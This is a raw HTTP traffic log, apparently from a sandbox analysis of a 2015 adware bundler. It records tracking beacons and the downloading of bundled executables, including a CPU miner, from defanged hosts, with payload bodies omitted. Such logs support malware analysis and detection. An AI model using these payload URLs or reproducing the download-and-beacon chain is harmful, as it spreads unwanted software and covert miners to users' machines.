Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:11 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:22 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:34 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:45 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:46 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:57 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:45:57 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:07 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 187
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:08 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 200
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:18 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:23 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:33 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 22:46:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:33 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=D825CDAEEB1043FA9CB4972941EB3F13; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=D825CDAEEB1043FA9CB4972941EB3F13,1443221193.18008; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /crossbrowse/ie/107/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40678
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop005.fr7.t,1443221125.cds005.fr7.c
<<< skipped >>>
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 58628829
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010096-gmsd_re_005010096
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 410
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:30 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26780
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1443221190; expires=Wed, 19 Jan 16 16:33:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443221190052851; path=/; expires=Sun, 25-Oct-15 22:46:30 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
<<< skipped >>>
GET /installer.gif?action=started&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=6189 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 3qzWs1YQAxm3PbDM seb8 haDV84wLHuBDXL1XYkebEaXx/RIyoxbI/FiuwlHSQZ
x-amz-request-id: 28E2E6E1A27C27A1
Date: Fri, 25 Sep 2015 22:45:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40692
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop005.fr7.t,1443221126.cds036.fr7.c
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=346a2c6645c6ec5865e603ca985dd203&_srvlog=NSI &browser=un&capp=nsdummy&cid=11612&current_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=D6A6947B24975DB6AB9DE8B171C5FA6E&sysid1=D6A6947B24975DB6AB9DE8B171C5FA6E&te=1443221160&ts=1443221159&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:\DOCUME~1\adm\LOCALS~1\Temp\nsx1C.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 22:45:59 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:33 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=02C3E07DDD974541923F9A204A02BCBB; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=02C3E07DDD974541923F9A204A02BCBB,1443221193.0778; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:18 GMT
Server: Apache/2.2.16
Last-Modified: Fri, 25 Sep 2015 15:36:08 GMT
ETag: "6a201e5-586f10-520941b404a00"
Accept-Ranges: bytes
Content-Length: 5795600
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=40706
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop005.fr7.t,1443221125.cds002.fr7.c
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:32 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=B171EA1CF77849208BC80261E6F3609C; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=B171EA1CF77849208BC80261E6F3609C,1443221192.82824; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 HTTP/1.1
Host: VVV.djapp.info
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 25 Sep 2015 22:49:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe
GET /data.gif?app=12345&ibic=8fa23ef88ff78dd88c0c9eef405f1630&verifier=928ea0cf8fffd7869c66f673dcd0cb80&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=9823 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:24 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443221125.dop009.fr7.t,1443221124.cds054.fr7.c
GIF89a.............,...........D..;
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:32 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 22:46:00 GMT
Set-Cookie: _c4aid=F478925BDE4F41C79B195A6D4C6D4251; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F478925BDE4F41C79B195A6D4C6D4251,1443221192.55363; expires=Wed, 23 Mar 16 22:46:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:24 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 48674
Connection: keep-alive
Date: Fri, 25 Sep 2015 21:06:28 GMT
Last-Modified: Fri, 25 Sep 2015 21:00:41 GMT
ETag: "67eda82fc3df3349df44916f6efe55bf"
Accept-Ranges: bytes
Server: AmazonS3
Age: 5913
X-Cache: Hit from cloudfront
Via: 1.1 bd5652a800046ffa43683320c0e731b4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: lVe1RAX7En0exaLRnFCbt2haXzmhex7aTh3j-d_Zez-YUHKanNryuQ==
<<< skipped >>>
GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:07 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441897175"
Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT
Cache-Control: max-age=28023
Content-Length: 104395
Content-Type: application/octet-stream
X-HW: 1443221168.dop008.fr7.t,1443221167.cds004.fr7.c
<<< skipped >>>
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:21 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=3384
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1443221122.dop003.fr7.t,1443221121.cds030.fr7.c
<<< skipped >>>
GET /36e0f22eacad857de2cd3b76aedc24a7.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 74893
Connection: keep-alive
Date: Fri, 25 Sep 2015 21:38:00 GMT
Last-Modified: Fri, 25 Sep 2015 21:31:39 GMT
ETag: "1f71f441cb13035d10d8b6979a628dda"
Accept-Ranges: bytes
Server: AmazonS3
Age: 4055
X-Cache: Hit from cloudfront
Via: 1.1 7ab285f149f01a2b05c04a9ee64a602f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TgrYDqhWJTlMIUXS8c_f99kD9zNetFl5j31Esoi9vMmZvh16ri29-w==
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:25 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=40706
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443221126.dop011.fr7.t,1443221125.cds004.fr7.c
<<< skipped >>>
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 91074
Connection: keep-alive
Date: Thu, 24 Sep 2015 23:30:47 GMT
Last-Modified: Thu, 24 Sep 2015 22:26:40 GMT
ETag: "029aa26a0dd5ef7bd1ba1639703f8fae"
Accept-Ranges: bytes
Server: AmazonS3
Age: 83711
X-Cache: Hit from cloudfront
Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gQTiec42-3YzniXrS_fdTXZmADEMUnkx0f7a5o3wGnPURx7di0cqbQ==
<<< skipped >>>
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:45:57 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1442816573"
Last-Modified: Mon, 21 Sep 2015 06:22:53 GMT
Cache-Control: max-age=28161
Content-Length: 104354
Content-Type: application/octet-stream
X-HW: 1443221158.dop001.fr7.t,1443221157.cds007.fr7.c
<<< skipped >>>
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010096-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 22:46:30 GMT
